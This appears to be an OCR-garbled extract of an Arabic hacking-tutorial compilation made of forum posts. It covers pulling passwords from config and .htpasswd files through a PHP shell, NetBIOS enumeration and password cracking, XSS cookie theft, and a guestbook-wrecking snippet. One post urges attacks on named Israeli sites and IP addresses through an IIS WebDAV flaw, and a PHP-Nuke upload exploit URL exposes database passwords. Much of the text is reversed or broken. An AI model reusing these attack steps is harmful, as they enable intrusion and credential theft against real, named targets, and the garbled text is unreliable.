<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
$$$$$$$$$$$$$$$<br />
الكاتب: Arab VieruZ<br />
$$$$$$$$$$$$$$$<br />
نتابعالموضو ع مباشره<br />
الجزء الرابع :<br />
^^^^^^^^<br />
طرقال حصول على الباسورد:<br />
درس عن الShell PHP (الجزء الثاني) "<br />
*-----------------------------------------------*<br />
هذا الجزء سیأخذ موضو ع ال ٢PHP Shell<br />
طرقال حصول على الباسوردهي مناصعب الطرق التيقدتواجه المخترق<br />
.<br />
*-----------------------------------------------*<br />
<strong>١</strong>-اخذالباس من ملفاتاكسسال My SQL التيتسمىبالعادة php.config<br />
ویمكناخذالباس عن طری قتنفیذ الأمر التاليفيال<br />
الذهاب الى المجلد الذي یوجدفیه هذاالمل ف وكتابة الأمر التالي<br />
وسیظهر الباسوردفياحدالمتغیرات<br />
PHP Shell<br />
php.cat config<br />
*-----------------------------------------------*<br />
htpasswed.<br />
/passwd/admin/forum/htpasswds./site/home :<br />
swdpas/admin/forum/htpasswds./site/home/cat<br />
:<br />
٢-اخذالباس المشفر من مل فال<br />
ویمكناجاد هذا المل ففياحد مجلداتالسیرفر واذالمتجدهقم بفتح ال htaccess. حتىتجد مكان<br />
المل ف السابق مثال<br />
الأمر<br />
ستجد الباس المشفر بتشفیر DESیعنيتقدرتفكهبجون ذا رایبر<br />
oerdY٣oS٤nymw:user<br />
*-----------------------------------------------*<br />
٣- طریقة الأكستینشون سیرفراو : pwd.service<br />
وهوتابعللفرون تبیج ویوجدبهالباسوردالخا صبالفرون تبیج مشفر DES<br />
ویوجد داخل مجلد<br />
:<br />
tvp_itv_<br />
الأمر : pwd.service/tvp_itv_/www/site/home/cat<br />
رابط : راجع درس DeXXa الخا صبهذا القسم<br />
oerdY٣oS٤nymw:user<br />
*-----------------------------------------------*<br />
٤- لا یمكناعتبارهاكقسم لاكنكملاحظةالا وهي :<br />
ان بع ضالمواقع تتحدفي سكربتات مثلال phpMyAdmin ویكونلكن موقعاكسس خا صلدخول هذا<br />
السكربت ویكونبمل ف ال php.config یكونالرو تللقاعدةیعني یمكنتعدلوتمسحايقاعدةلأي<br />
موقعكان !!<br />
<strong>١</strong>٩٦
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
$$$$$$$$$$$$$$$<br />
الكاتب: Arab VieruZ<br />
$$$$$$$$$$$$$$$<br />
درس عن الShell PHP (الجزء الثالث) "<br />
الجزء الخام س والأ خیر<br />
^^^^^^^^^^^^^^<br />
بماانكالآن عرفتمعظمالأشیاءلكن لابد من وجود مشاكل سأذكر الذياصابني<br />
*-----------------------------------*<br />
<strong>١</strong>- مشكلة عر ض المواقعالاخرى :<br />
جمیعالمواقع الموجودةفيالسیرفرفي<br />
:<br />
/<br />
home/<br />
الأمر :قمبالذهاب الى مجلد الروت<br />
home/a -ls<br />
ستجد مجلداتكل مجلد یحوي ملفات موقع ما لعرضه<br />
SITE/home/a -ls<br />
SITE =اسمالموقعاوالمجلد<br />
:<br />
*-----------------------------------*<br />
:<br />
:<br />
٢- مشكلة عر ض ملفات الموقع<br />
بع ضالسیرفرات لاتسمحبدخول home الموقعالااذاكن تانت روتاو صاحب الموقع الحل<br />
قمبدخول<br />
/public_html/tesi/home<br />
او<br />
/www/site/home<br />
لدخول الى ملفات الموقع التيتعر ض<br />
*-----------------------------------*<br />
٣- بع ض الأوامرلاتعمل<br />
هذه مشكله منالصعب حلها ویجباستعمالباك دور خا ص بكرنلالسیرفر ... اقصداصدار الكرنل .<br />
<strong>١</strong>٩٧
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
" شرح أداة " anmap<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$$$$$$$$$$$<br />
مترجمبواسطة:الهكر الخجول<br />
$$$$$$$$$$$$$$$$$$<br />
:<br />
nmap<br />
الإسم<br />
-أداةكش ف عنالشبكات و ماسحأمني<br />
الخلاصة<br />
أنوا ع المسح -الخیارات<br />
:<br />
الوص ف :<br />
صمم هذا البرنامجلكي یسمحلمدراءالنظام و الأفرادبمسح شبكاتكبیرة لتقریرومعرفةالمضیفین<br />
وماذا یقدمون من خدمات . وتدعمالإنماب عددكبیر منتقنیات المسح مثل<br />
:<br />
.. مثل :<br />
UDP<br />
()TCP connect<br />
(TCP SYN (half open<br />
(ftp proxy (bounceattack<br />
Reverse-ident<br />
(ICMP (ping sweep<br />
FIN<br />
ACK sweep<br />
Xmas Tree<br />
SYN sweep<br />
.and Null scan<br />
الإنمابتقدمأیضاً عدد منالممیزات المتقدمة<br />
TCP/IP fingerprinting remote OS detection via<br />
stealth scanning<br />
dynamic delay and retransmission calculations<br />
parallel scanning<br />
detection of down hosts via parallel pings<br />
decoy scanning port<br />
filtering detection<br />
direct (non-portmapper) RPC scanning<br />
fragmentation scanning<br />
flexible target and port specification<br />
<strong>١</strong>٩٨
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
:<br />
نتائجالإنماب عادةاً ماتكون علىهیئةقائمةبالبورتاتالمهمهالتيتوجدفيالآلةالتيأجریت علیها عملیة<br />
المسح . والإنماب دائماًیعطیناالبورتات وإسمالخدمة والعدد والحالة والبروتوكول<br />
الحالهإماأنتكون مفتوحةاو مرشحةأو غیر مرشحة<br />
مفتوحةتعنيأنالآلة سو فتقبلأيإتصالبهذاالبورت<br />
المرشحةتعنيأنهناكفایروولأوفلتر (مرشح)أوأي عقبةأخرىتغطي هذاالبورتوتمنعالإنماب من<br />
معرفة حالةالبورتإ ذاكان مفتوحاًأو لا<br />
غیر مرشحتعني بأن هذاالبورت معرو فلدىالإنماب بأنه مغلق ولا یبدوأنأيفایروولأوفلتر (مرشح)<br />
تدخلفي محاولةالإنماب والبورتات غیر المرشحة هيأغلبالحالات ولا یمكنمعرفتهمإلافي حالة واحدة<br />
، هيأن یكونمعظم البورتاتالتيأجریتلهم عملةالمسحفي حالةترشیح<br />
وبا لإ عتماد علىالخیارات المستخدمهفيالإنمابفیمكنأن یبلغ عنالحالاتالممیزةالتالیةفي الریموت<br />
هوست<br />
النظام المستخدم<br />
TCP sequencability<br />
أسماءالمستخدمینالذین یشغلونالبرامج المرتبطة بكلبورت<br />
أسماءالديإنإس<br />
وبع ض الأشیاء الأخرى ...<br />
<strong>١</strong>٩٩
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
طریقة لإقتحام السيرفرات بدون ثغرات<br />
"<br />
$$$$$$$$$$$$$$$$$$<br />
الكاتب: network access<br />
$$$$$$$$$$$$$$$$$$<br />
فیه طرقمعروفهتمكنك منالدخول ولوبنسبه ٥٠% علىاغلبالسیرفراتالموجودهبالعالم لاحظ ٥٠%<br />
اولا الجهماتالاولى دائمایكون الغر ض منهاتكوینمعلومات عامه عنالسیرفرالذي یراد مهاجمت ه ومن<br />
هنا نبداالهجوم وعلىاياساسیتركزالهجوم.<br />
احیانا یكونهجوم حرمان خدمه واحیاناهجوماقتحامكامل حسبالموجود والمتوفر والمعلوماتالموجوده<br />
لدینا.......... طیبلنفر ضاننا ودنا نخ ش على شركهمعینهباسم aswind.COM الخطوهالأولى هي<br />
التعر ف على مد ى عنوان ip الخاصهبهذهالشركه وهذا سهل<br />
اول شيانصحبالتسجیلفي موقع INTERNIC.NET حتىیعطونك خدما تتستاهل<br />
هناك طریقتینلمعرفهالايبي اولا<br />
عن طریقالموقعINTERNIC.NET<br />
والثانیه عن طریقبرنامجالدوسبالامر<br />
:<br />
:<br />
NSLOOKUP<br />
SET TYPE = ALL<br />
aswind.COM<br />
را حتطلعلك المعلومات هذيبالضبط<br />
Domain Name: ASWIND.COM<br />
Registrar: ONLINENIC, INC.<br />
Whois Server: whois.OnlineNIC.<strong>com</strong><br />
http://www.onlinenic.<strong>com</strong>/Referral URL:<br />
Name Server: DNS.ASWIND.COM<br />
Name Server: NS1.ASWIND.COM<br />
Updated Date: 01-apr-2002<br />
معنا الكلام هذاان شركه aswind.<strong>com</strong>وضعتارقامالملقامات الخاصه ب2 = DNS<br />
یعني عدد٢ خادم DNSوسوتلها نشریعني هناك علىالاقل سیرفرین شغالینبخدمه DNS یعنيهم<br />
یتعتقدونان الموضو ع ماراح یاخذكثیر من طاقهالتشغیلللأجهزه خاصه DNS<br />
هنافي مجالللدخولوتعدیلبیانات DNSبمعنىانالعملیهتصیر واسعه شويفقطقمبنشر عنوانین من<br />
عنواوین Ipفق ط مثل ماسوو aswind.<strong>com</strong>لكنلنفتر ضانهفیه اكثر من عنوانلنفول ٦ مثلا .<br />
عشانكذااقترح على الشركاتوضع عنواونین IPللنشر ووضع خوادم DNS علىاجهزهقدیمه وبطی ئه<br />
لأنكاساسافي حاجه ل DNSداینامیكي وهذایعنيانكتقوم بتشغیل WIN2Kوخدمه DNS على جهاز<br />
واحد وهذي من الافكارالجیدهفي نظرياذا وضعت جهاز خا صفقطبال DNS<br />
طیبلنفر ضانك مالقیت شي علىاجهزه DNS وبماانكفيبدایه هجوم هذایعنيانه عندك متسع من<br />
الوقت اذنقم بتجریب جمیعالعناوینالمتوفرهلدیك والتي حصلت علیها من HowISوصدقونيفیه<br />
ادوات موجودهبالنت مممكنانهاتمسح مجموعه IP موجودهفي شبكهمعینه<br />
طیبقم بعمل مل فاسمه LMHOSTS یوجدفیهاسم NetBiosلكل عنوان IPاستطع تانكت حصل<br />
علیه<br />
٢٠٠
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
یعنيانت عرف تانالشبكه منكلاس C وعنوانها ٢٠٠٫٢٠٠٫٢٠٠٫٠ سولك مل ف LMHOSTSباسم<br />
Net view وهكذا بعدینتحتاج عمل N2 فباسم = 200.200.200.2 NetBiosومل<br />
//servername<br />
٢٥٤<br />
\<br />
)<br />
لكلاسم من N1إلى N254 یعنيكانكتسوي سكانبورتب سبطریقهثانیه<br />
من جهاز رقم <strong>١</strong>إلى جهاز رقم<br />
وبالنسبهللأجهزهالص حیحه سو فتشتغل الخدمهفیهاام العناوینالغیر متصلهفلنتستجیب طبعاً<br />
طیبانتالاالان ماتقدرتسوي شي<br />
بستقدر تتاكد من حساب Administrator موجود والا لااوتمتغییرهاواذا هناك یوزر نیمبنفس<br />
الصلاحیا تان تبطبیعه الحال ماتقدرت حصل علیهبسهوله<br />
اذنهناكابواب خلفیهللحصول علیه من بع ضالطرقالوصوللبع ضاسماء المستخدمینالموجودینفي<br />
الشركه وهذایعتبر عیب من عیون Windwosلانهاتطنشهمههههههههه مدريلی ش<br />
فیهامرتقدرتعر ف من خلالهبسألاالانانت ماتقدرتسویهلانه مالك حق وصول مباشریعنيانت لازم<br />
ت حصل على usernameلاي and password یوزر موجودفيالمجالالامر هو net user وهو<br />
یستعرضلك جمیعالمستخدمینالموجودینبالمجال<br />
لكنفیه طریقهلل حصول علىاسماءبالهبل ههههههه<br />
كی ف ؟؟<br />
الان عندما یقوم مستخدم بتسجیل دخول یقوم جهازهلیسفق ط بتسجیلاسمهفقطبلاسم جهازه یعني على<br />
سبیل المثال مدیرالشبكهاذا صار عنده زحمه یشغل خدمهاسمها مراقبه النظام حتىیعر فانه وصلللحد<br />
الأقصى<br />
عندما یقوم مستخدم بتسجیلالدخولتقوم خدمه Messenger Service بتسجیلاسمالمستخدمكاحد<br />
اسماء NetBios الموجودینفيالشبكهالي ان تاساسا جالستبحث عنهم وعلىافترا ضانك دخلت على<br />
خادم بعنوان IPفأناي 200.200.200.200 شخ صاذاقام بعمل nbtstat a-<br />
200.200.200.200سیتكمن منمعرفهاسم جهازك واسم المستخدم واذاكان جهازك<br />
MSBROWSERاو لا سو ف اتحد ث عنهابالتفصیل (<br />
طیبلنفر ضانفیه شخ صباسم John ورقم200.200.200.50 IP موجودفيالشبكهفانكاذاقمت<br />
راح یضهرلكانهفیه شخ صباسم john واسم جهازه<br />
)<br />
بعمل Nbtstat -a 200.200.200.50<br />
johnPC<br />
. (<br />
(<br />
الأن موجودمعكاسم مستخدم (احتمال یكون ( Administrator طیب و ش نسوي<br />
؟<br />
قوم بتعطیل خدمه Messengerفي Service جهزك ) ولنیتمتسجیلاسمكفيالنطاقیعني بتخ ش<br />
مخفي<br />
وبالسنبه ل MSBROWSER اذا شفتها بعد عملالامر nbtstat a-<br />
هذایعنيانهاستعرا ض رئیسيللمجال وهذا مناكبرالاخطاء التي یقومونبها مدراءالشبكا تلان مراقب<br />
المجال یدو خ لا یستطیعالتجمیعوتستطیعاستغلال مثل هذه الثغرات دائمافيالشبكاتالدا خلیه<br />
طیبانتالان حصل ت علىاسم المتسخدم<br />
انت محتاجكلمه المرور وهذي هيالمشكلهیعنيانت ضمیت جهازك مع الشبكهلكن ماقدرتت حصل على<br />
كلمه المرورلكنتقدرت حصل علیها nt senstiver او مت حسس الشبكه معلی ش ماني متاكد من<br />
السبیلنق<br />
طیبكی فاقدراحصلفعلیا علىكلمهالمرور<br />
غالبا ماتكونكلمات مرورالمستخدمینتاففه جدا هاذاذا وجدتاصلا<br />
یعنيبرنامج مثل l0pthcrackیحللك المشكله....<br />
٢٠<strong>١</strong>
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
" Cross Site Scripting<br />
"<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$<br />
الكاتب tcp:<br />
$$$$$$$$<br />
المتطلبات<br />
معرفةتامهبلغة HTML<br />
:<br />
اطلاع غیر متعم ق علىلغاتالسكربتینق وهي JAVASCRIPT ,PERL ,CGI ,VBSCRIPT<br />
ومن وجهة نظر شخصیةالمصایبكلها منالجافا سكربت والهتمل<br />
==========================================================<br />
الاهدا فالمنشوده<br />
:<br />
*افهامالقارئ عنالكیفیة التىیتمفیها سرقةمعلومات هامه من جهازالمستخدم<br />
*اختراقالمنتدیا ت من نو ع VBULLETINاو YaBBاوالمجلا and UBB ت منالبهب نیوكاو<br />
بوس ت نیوك<br />
* افهامالقراء عن الكیفیةالتي تتمفیها سرقةالكوكیزاواختطا فالجلسة منالمستخدمین<br />
*ان یستطیع القارئتوسیع مداخلالاختراق<br />
: المشكلة<br />
كما هومعرو ففان مستعرضاتالوب مثلالاكسبلورراو نت سكیب ...الختاتي مترجماتالنصو صاو<br />
السكربتات<br />
مبنیة داخلها ویتمترجمة السكربتا ت على جهاز المستخدمفلواننا طلبنا صفحةكانبها سكربتمعین<br />
فانالمستعر ضیترجم هذاالسكربت ویظهره على نفس الصفحهالمطلوبه<br />
.<br />
امابالنسبةللمندیاتاو مجموعاتالنقا شفانهاترف ض مثل هذهالسكربتاتوتعتبرها خر قللخصوصیة<br />
اوقدتستغلفيا غ را ض سیئةلسرقةمعلوما ت حساسة منالمستخدمین<br />
المثالالتالي یوضحكیفیةادراج السكربت<br />
:<br />
٢٠٢
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
message. Hello FOLKS board. This is a<br />
malicious code<br />
end of my message. This is the<br />
انكلمة maliciousتمادرجهااو code حقنهافيبین علامتي السكربت وقدتحتوي علىكود خبیث<br />
یسرقاو یرسلبیانات ...الخلذلكفان مصمموابرامجالمنتدیات ومطوروا یمنعونهاالااذا مكنهاالادمن<br />
اوالمصمماوقدیتماستخدامهااذا مكنالمنتدىتفیل HTML مثلایتمادراجالسكربت مكان خاصیةالامج<br />
img>document.write('<br />
؛'HREF="http://example.<strong>com</strong>/<strong>com</strong>ment.cgi? my<strong>com</strong>ment= A><br />
here Click
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
هنااستخدم نفسالسكربتالسابقلكن هذهالمره طورهاكثرلیكون مستخدمافيادراج مل ف من موقعاخر<br />
والذي<br />
هوبالاسم BADFILE ولان مصدرالبیاناتادخلفیه عدة مصادراخرى عن طریقالسكربتالمذكور<br />
فأن هذاالهجوم<br />
یسمى ب cross-siteاو scripting الترجمه من عندي "برمجة عبور الموقع "لاننا عبرنا<br />
باستخدامبرمجة<br />
السكربتات اكثر من موقع واذاكنتتلاحظفيالسیكیورتيفوكساوالمواقعالامنیهتختصر ب CSS<br />
وهياختصار<br />
ل scripting cross-site ولیس ل<br />
CASCADE style sheets اياوراقالانماطالمت الیة<br />
قد یدخلبدل الوسماو علامةالسكربتاي من الوسومالتالیة<br />
and ، ، ،<br />
ومنالممكنان یكونهناكوسمالنماذج من وسوم HTML وبنفسالافكارالسابقة یمكنتنفیذ<br />
الاوامر<br />
منهالسرقةالكوكیزاوبیاناتاخر ىاوتوجیهكلصفحاتاخرى<br />
اذاكنتقرات ماكتبته عن التكویدالسداسي عشر والیونیكودتستطیعالانانتفهم مااقصده<br />
=========================================================<br />
ولمزید منالتفاصیل<br />
http://www.cert.org/advisories/CA-2000-02.html<br />
:<br />
http://www.perl.<strong>com</strong>/pub/a/2002/02/20/css.html<br />
...<br />
٢٠٤
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
كود تدمير سجل الزوار<br />
"<br />
"<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$$$<br />
الكاتب:العبقري<br />
$$$$$$$$$$<br />
.<br />
.<br />
.<br />
.<br />
.<br />
.<br />
.<br />
.<br />
.<br />
.<br />
.<br />
.<br />
.<br />
كود صغیر جداب حجمه،كبیر بقدرته علىتدمیر سجلالزواربالكامل...انتمتعرفون طبعاكیفیة عملتوقیع<br />
في سجل الزوار، الأسم -الأیمیل - موقعكالشخصي- تقدیركللموقع - طریقة الأستدلال......والنقطه المهمه<br />
وهي كتابةتعلیقك على الموقع؟؟؟؟؟؟؟<br />
ن حن سو فنضعكل شي حسب ماهو مطلوب ولكن عندما نأتيلكتابةالتعلی ق...........نق ف ونكتب :<br />
هذا هوالكود<br />
:<br />
==================================================<br />
h3>put your text here
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
شرح شبه مفصل عن الثغرات<br />
"<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
$$$$$$$$<br />
الكاتب icer:<br />
$$$$$$$$<br />
الموضو عالیوم ینقسمالىالتالي :<br />
- <strong>١</strong> كی فتجد اكسبلویتات ؟<br />
٢-كی فتستعمل الاكسبلویتات (دعونا نسمیهااستثمارات )؟<br />
انوا ع مختلفه منالاستثمارا ت...<br />
مواقع مفیدهللب حث ع لالثغرا ت...<br />
-٣<br />
-٤<br />
××××××××××××××××××××××××××××××××××××××××××××<br />
a face at the interface :<br />
الاستثمارا تتستخدم عادهلكيت حصل عل الرووت عل نظام معین ..والرووت هو عباره<br />
عنالادمینیستراتوراو مدیرالنظامالذيتریداختراقه... الاستثمارات دایما ماتوجد<br />
بواسطه مل ف معین یجعكتستطیعالدخولبواسطهال httpبصوره طبیعبه<br />
لذلك نستخدم scannerلب حث عن هذاالاستثمار ....یو جد العدید منالاستثمارات مثل<br />
..<br />
BOF (buffer over flow) , DoS ( denial of service) ,<br />
...<br />
....<br />
و علىفكرهاناااؤمنانال هجومال DoSهياكسبلویت<br />
و یوجدایضا الثغراتالتي تتیحلكتنفیذ بع ضالاوامر مثل عر ض و مسح والكتایه علىالملفات<br />
م ثالاكستینشنز و غیرها بالنسبهلموضو عالبوفراوفرفلوفهو یشبهالى حدكبیر<br />
حی ثیعتمد علىارباكالسیرفیر بفی ض من المعلومات و یمن حك الروو ت.<br />
اما هجومال DoSفهو عباره عنارسال GETال / POST السیرفیر مما یؤديال<br />
حدو ث OVERLOADلوحدهالمعالجهالمركزیهللسیرفیر اللي هو عباره عن جهاز یعمل<br />
24ساعه )فیتوق ف الموقع عنالعمل و یصبحالسیرفیر.... OFFLINE<br />
)<br />
ال DoS<br />
××××××××××××××××××××××××××××××××××××××××××××××××××<br />
<strong>١</strong>- كی فتجداستثمارات ؟<br />
لكيتستطیعانتستثمرثغرهمعینهفي سیرفیرفانه یجب علیك اولاان تتاكدانالثغره موجودهفي<br />
السیرفیر<br />
ولماكانالاستثمار عباره عنفایل معین ..فانه یوجد طریقتینلمعرفه مااذاكانتالثغره موجودهام لا..<br />
اما عن طریق التطبیق مباشره من خلالالمتصفحكمافي حاله بع ضثغ را تامتصفح مثلالیونیكوداو<br />
الفرون تبیج<br />
اوانتستخدمالسكانرزفيفح ص الموقع .. طبعا منالمعرو فانثغرات المتصفحلها سكانرزال<br />
threads<br />
و هيتسمىال cgi scaners بعضها ممكنانتضی فله ملفاتبهاثغرات والبع<br />
احبذه
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
red hat 7.2 ......<br />
××××××××××××××××××××××××××××××××××××××××××××××<br />
٢-كی فتستغل هذهالثغرات ؟؟<br />
الكثیر منالناس عندما یف حصون موقعبسكانر (و خاصهال ) shadow و یطلعلهماستثماراتمعینه<br />
..لایعرفونای ش یسوون<br />
بعدكذا؟؟؟؟...<br />
لوانت بتستعملالشادو حتلاقي urlبجانبالثغره تزرو العنوان ده وتقرهكلكلمهتلاقیها هناك<br />
اواذالمتجداي urlفيالسكانرزالاخر ى یبقىتاخداسم اثغره وتروحالموقع rootshell.<strong>com</strong><br />
وتكتبفي محركالب حثاسمالثغره و ان تان شاءااللهفي ٩٩% من الحالات بتلاقياستثمارلهاي<br />
الثغره..<br />
وكی فتستخدمها واشیاء زيكده.......<br />
..<br />
..<br />
×××××××××××××××××××××××××××××××××××××××××××××<br />
:<br />
-٣<br />
..<br />
....<br />
..<br />
انوا ع مختلفه منالاستثمارات<br />
طبعاالكثیر منالاستثمارات یكون هدفها هو من حك الرووت علىالسیرفیر .. معنىكلمه رووتهو المدیر<br />
اوالادمین ..لا یوجدايقیود علىال <strong>com</strong>mands اللي الرووت یكتبها ايلككلالصلاحیات على<br />
السیرفیر<br />
وال حصول على الرووت یمكنانیتم من خلال العدید من الثغرات مثلثغراتال , httpوال BOF و<br />
غیرها<br />
كهاتعتمد على طریقه عملالثغرات ..فهيقدتعطيلك صلاحیهقراءه و حذ ف والكتابه عل الملفات و<br />
ایضا<br />
رفع ملفاتالىالسیرفیر<br />
اوقدتعطيلك الكلمه السریه واسمالیوزرامافي صوره واضحه مثلالمل ف config.inc او مشفره<br />
بمقیاس<br />
... DES/MD5كمافي المل ف .... etc/passwd/فيانظمهالیونیك س...<br />
بالنسبهللبفراوفرفلوفهو یشبه الى حدكبیر هجومال DoS ولكنه لا یسبب ضررللسیرفیر مثلما یسببه<br />
هجومال DoSالمهمانهفياغلبالاحیان یكون البفر عباره عنارسالاوامرللسیرفیرتنتهي دائما<br />
باعطائك<br />
صلاحیهالرووت ... و هذابسبباستقبالالسیرفیرلكم هائل من الداتافیؤدي الىارباكالسیرفیر..<br />
××××××××××××××××××××××××××××××××××××××××××××××××××<br />
×××××××××××××××××××××××××××××××××<br />
:<br />
-٤<br />
:<br />
packetstorm.securify.<strong>com</strong> /.securityfocus.<strong>com</strong> /www.insecure.org<br />
/http://rootshell.redi.tkو غیرهاابحث سو فتجدالمزید :)....<br />
مواقع مفیدهللب حث عنالثغرات من خلالها<br />
یمكنك الب حث عنالاستثمارات الجدیدهفي هذه المواقع<br />
٢٠٧
hi_HaCkEr & MaXhAk2000<br />
"<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
" كیف تستخدم الثغرات<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$$$$$$$$$$<br />
الكاتب: VoOoDa BE$T<br />
$$$$$$$$$$$$$$$$$<br />
البدایة :<br />
txt. :<br />
ویعني مل ف مل ف نصي..من الممكناي یحتوي على سورسكودلبع ض الثغراتاو البرامجالمكتوبة<br />
بالسي اكمل القراءة لتعر فكیفیةاستخدامها..<br />
، البیر..<br />
<br />
c. :<br />
هوبرنامج سيلكنه سورسكودفقط..واغلب الثغراتیتم كتابتهابالسي..هذا یفتر ض علیك<br />
علیكتحمیلهثم عمل (<strong>com</strong>pile) _وهذایعنيتحویلالسورسكودلمل ف برنامج)_ثمتثوم<br />
بتشغیله... لكن المشكلةهناانهلن یمكنتشغیلهاتح تبیئة ویندوز..فیجبان یكون عندك Linuxاو<br />
)<br />
.. Shell Account<br />
بع ضالتحمیلتوجهللمسارالموجودبه المفلثماكتب:<br />
----
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
تمتع بإختراق المواقع الإسرائیلیة مع هذه الثغرة<br />
"<br />
$$$$$$$$$$$$$<br />
الكاتب DeadLine:<br />
$$$$$$$$$$$$$<br />
الشرح<br />
اولاً الثغره یاأخوانتطبق على سیرفرات<br />
:<br />
:<br />
Microsoft-IIS/5.0 on Windows 2000<br />
یاأخوانكل مانحتاجه هياداهبسیطه یقدمهالنا وندوز ٩٨ وانني لااعلمانكانتالنسخالاخرىتمتلك<br />
مثل هذهلخاصیهام لا لاننياعمل على نظامینفقطلینكس ماندریك ووندوز٩٨فقط<br />
:<br />
الاداه هيFolders : Web<br />
این نجد هذه الثغره :<br />
حسناً سو ف نجدهاانشاءاللهفي الخطوات التالیه<br />
:<br />
ادخل على My Computer<br />
ثم ستجدهاهناكلیس داخل السياو شيء آخربل داخل Myفق Computer طیعنيتكون هي معالسي<br />
والدي الى آخره<br />
نفتح یاأخونالمل ف المسمى Web Folders<br />
ثم سنجدالآتي<br />
:<br />
Add Web Folder حیثهي التي ستكوناداتنا المهمهللاختراق<br />
نفتحال : Folder Add Web<br />
حیث نجدكلمة Type the location to add<br />
ونرىتحتها مستطیل نقوم بأدخالالآتي<br />
:<br />
http://hostname.<strong>com</strong>/<br />
حیثان hostnameهوایبيالموقعانتبهقلناایبي الموقع ولیسالاسم<br />
والجمیعیعر فكی ف یخرجالایبيتبعالموقع وهناك دروسكثیرهبخصو ص هذاالموضو ع<br />
وهذه مواقعاسرائیلیهللتطیب ق حیثانهاتعمل علىایبي موحد<br />
:<br />
mail.talcar.co.il<br />
daihatsu-israel.co.il<br />
daewoo-israel.co.il<br />
٢٠٩
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
ندخلبالمستطیلالذيتم ذكره<br />
:<br />
http://192.117.143.121/<br />
ثم نضغط علىكلمة : Next<br />
وهنا سو فتعملالاداه بتحمیل ملفات الموقعوتعطیك خاصیةالادمن وهيتحمیل وازالة الملفات<br />
فبعدان ینتهي البرنامج منالتحمیلتظهرلككلمة : finish<br />
عندهاتذهب الىال : Web Folder وتجد مل فالموقع هناك ومسمىتحتایبي الموقع<br />
موقعاخرللتطبیق<br />
212.199.43.84http://www.israwine.co.il/<br />
:<br />
ملاحظه :اذاتم طلبادخالباسوورد ویوزر نیمفأعر فانالثغره مغلقه<br />
اواذا دخلتالى الملفات ولمتجداي ملففمعناهانالثغره مغلقهایضاً<br />
اسئلااللهالتوفیق والعافیهاللهمامیناللهمامین...<br />
٢<strong>١</strong>٠
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
"ثغرة نیوك "<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$$$$$$$$<br />
الكاتب: Arab VieruZ<br />
$$$$$$$$$$$$$$$<br />
الشرحبالأنقلیزیة :<br />
day from LucisFero and supergate٠here your :twlc<br />
CDT <strong>١</strong>٤:٢٥:٥٨ @ ٢٤ Posted on Monday, September<br />
advisories :topic<br />
twlc security divison<br />
٢٠٠<strong>١</strong>/٠٩/٢٤<br />
.Php nuke BUGGED<br />
:Found by<br />
LucisFero and supergate<br />
twlc/.<br />
Summary<br />
it allows you to 'cp' any file on ...This time the bug is really dangerous<br />
...or even upload files ...the box<br />
is<br />
٥٫٢is ok while the final<br />
dSystems Affecte<br />
all the versions ARE vulnerable<br />
.i wonder why a released c) '<strong>١</strong>RC ٥٫٠ except '<br />
(bugged<br />
Explanation<br />
Do you need sql password?<br />
<strong>١</strong>=php?upload.admin/net.server.www//:http<br />
config=elifresu&/images/=txt&wdir.hacked=php&file_name.config=elif&<br />
txt .hacked=php&userfile_name.<br />
the admin 'login' page will be prompted just go to<br />
php .txt and you will see config.hacked/images/net.server.www//:http<br />
that as everyone knows contain the sql's passwords, you can even<br />
and try ...un' to find all the ways to use iti leave you the 'f...upload files<br />
to dont be a SCRIPT KIDDIE we wrote this advisory to help who runs<br />
.php nuke and NOT TO LET YOU HAVE FUN<br />
٢<strong>١</strong><strong>١</strong>
